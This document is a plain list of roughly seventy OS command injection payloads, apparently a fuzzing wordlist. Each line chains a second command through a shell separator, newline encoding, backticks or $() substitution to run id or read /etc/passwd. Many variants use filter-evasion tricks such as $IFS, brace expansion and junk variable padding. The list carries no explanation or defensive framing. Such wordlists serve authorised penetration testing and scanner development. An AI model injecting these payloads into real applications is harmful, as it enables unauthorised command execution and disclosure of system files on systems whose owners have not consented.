||+id
|+id
;+id
&&+id
&+id
`id`
;cat%20/etc/passwd
;cat+/e${hahaha}tc/${heywaf}pas${catchthis}swd
;cat$u+/etc$u/passwd$u
;{cat,/etc/passwd}
;cat</etc/passwd
;cat$IFS/etc/passwd
;echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
;/usr/bin/id;
|cat%20/etc/passwd
|cat+/e${hahaha}tc/${heywaf}pas${catchthis}swd
|cat$u+/etc$u/passwd$u
|{cat,/etc/passwd}
|cat</etc/passwd
|cat$IFS/etc/passwd
|echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
|/usr/bin/id|
||cat%20/etc/passwd
||cat+/e${hahaha}tc/${heywaf}pas${catchthis}swd
||cat$u+/etc$u/passwd$u
||{cat,/etc/passwd}
||cat</etc/passwd
||cat$IFS/etc/passwd
||echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
||/usr/bin/id||
&&cat%20/etc/passwd
&&cat+/e${hahaha}tc/${heywaf}pas${catchthis}swd
&&cat$u+/etc$u/passwd$u
&&{cat,/etc/passwd}
&&cat</etc/passwd
&&cat$IFS/etc/passwd
&&echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
&&/usr/bin/id&&
&cat%20/etc/passwd
&cat+/e${hahaha}tc/${heywaf}pas${catchthis}swd
&cat$u+/etc$u/passwd$u
&{cat,/etc/passwd}
&cat</etc/passwd
&cat$IFS/etc/passwd
&echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
&/usr/bin/id&
%0acat%20/etc/passwd
%0acat+/e${hahaha}tc/${heywaf}pas${catchthis}swd
%0acat$u+/etc$u/passwd$u
%0a{cat,/etc/passwd}
%0acat</etc/passwd
%0acat$IFS/etc/passwd
%0aecho${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd
%0a/usr/bin/id%0a
`cat%20/etc/passwd`
`cat+/e${hahaha}tc/${heywaf}pas${catchthis}swd`
`cat$u+/etc$u/passwd$u`
`{cat,/etc/passwd}`
`cat</etc/passwd`
`cat$IFS/etc/passwd`
`echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd`
`/usr/bin/id`
$(cat%20/etc/passwd)
$(cat+/e${hahaha}tc/${heywaf}pas${catchthis}swd)
$(cat$u+/etc$u/passwd$u)
$({cat,/etc/passwd})
$(cat</etc/passwd)
$(cat$IFS/etc/passwd)
$(echo${IFS}"RCE"${IFS}&&cat${IFS}/etc/passwd)
$(/usr/bin/id)
id
